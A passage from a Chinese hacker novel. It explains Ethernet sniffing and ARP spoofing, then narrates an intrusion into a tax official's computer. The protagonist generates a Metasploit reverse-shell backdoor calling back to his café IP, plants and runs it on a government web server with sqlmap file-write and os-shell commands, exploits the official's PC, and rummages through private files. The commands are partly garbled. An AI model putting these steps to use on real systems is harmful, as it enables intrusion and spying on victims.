嗅探,是个很古老的技术,要知道在以太网中,所有的通讯都是广播的,也就是说通常在同一个网段的所有网络接口都可以访问在物理媒体上传输的所有数据,而每一个网络接口都有一个唯一的硬件地址,这个硬件地址也就是网卡的mac地址,大多数系统使用48比特的地址,这个地址用来表示网络中的每一个设备,一般来说每一块网卡上的mac地址都是不同的,每个网卡厂家得到一段地址,然后用这段地址分配给其生产的每个网卡一个地址。在硬件地址和ip地址间使用arp和rarp协议进行相互转换。
正常状态下,网卡会根据基于osi模型的tcp/ip协议,接受和发送只和自己mac或者是ip相关的数据,可一旦网卡处在了另一种混杂模式的时候,它会接受任何一个经过它的广播数据包,如果在加上arp网关欺骗,那么捕获到的数据将是整个交换机下主机的通信数据,根据网络传输协议的编码原则,这些数据在没有加密的情况下,是很容易进行分析的,而且数据报文也是明码显示的。
脑中想着嗅探的原理,淼风在网管李志的注视目光中,再次坐在了19号机前。
打开自己临时注册的邮箱,看到附件大小不定的十几封邮件,淼风握了握双手,嘴角一动,开始分析数据。
时间悄然流失,淼风抽着烟,靠在椅子上,滚动着鼠标,半眯着眼睛查看着一封封凌乱的数据邮件,同时脑中同步进行着数据分析。
十几分钟后,淼风坐直了身子,伸出被他放进口袋取暖的左手,开始敲打键盘。
新建的txt文档中,涉及地税局副局长陈升的信息被罗列了出来。
陈升,地税局副局长,1月14日晚上九点将参加由市局统筹安排的领导见面会,秘书姓名:宋云。
手机号码:130xxxx9987,内线座机8971,办公电脑ip:10.3.3.97。
看着从庞大嗅探数据中捕获的简短信息,淼风吐了口气,再次安装了虚拟机,并加载了自己的linux_live_cd,启动sqlmap,用昨晚相同的方式进入了地税局web服务器。
启动metasploit,payload_windows/meterpreter/reverse_tcp_lhost=星空网吧外网ip_lport=443_r_|_msfencode–b_–t_exe_–o_root/desktop/fox.exe生成反弹链接后门。
ifconfig查看了一下本地链接ip网关地址,浏览器打开网关,看到tp标识的时候,淼风点了点头,直接通过几年后tp的路由web后门将本机内网ip设置成了dmz主机(将内网主机所有端口全部映射到外网)。
sqlmap.py_-u_"dishuijuguanfangwebzhurudian"--file-write_"/root/desktop/fox.exe"--file-dest_"c:/windows/temp/fox.exe"_-v_1将反弹后门写入地税局官网web服务器的windows下的temp目录,文件名为fox.exe
sqlmap添加--os-shell,通过shell执行fox.exe,几秒中之后metasploit显示成功,反弹回一个meterpreter的shell。
namp_10.3.3.97,返回端口开发情况135,448,139……,随便从metasploit中找了一windows的exploit,对10.3.3.97溢出!getshell成功!
陈升主机被拿下!罗列了一下主机的硬件信息后,让淼风发现了一个有意思的东西,陈升的主机装着耳麦和摄像头!“这下我可以看一下你工作的时候都在干什么了!不过不急,让我看看你的电脑上都放着什么东西。”
吐了口气,淼风开始罗列陈升电脑上的文件,计划书丢弃,工作安排丢弃,“这个是……”看着以“重要文件”命名的文件中显示的三百多个以avi后缀名的文件,淼风眉头动了一下。调用本地视频播放软件打开之后,一个穿着三点的半裸女人出
第十一章内网渗透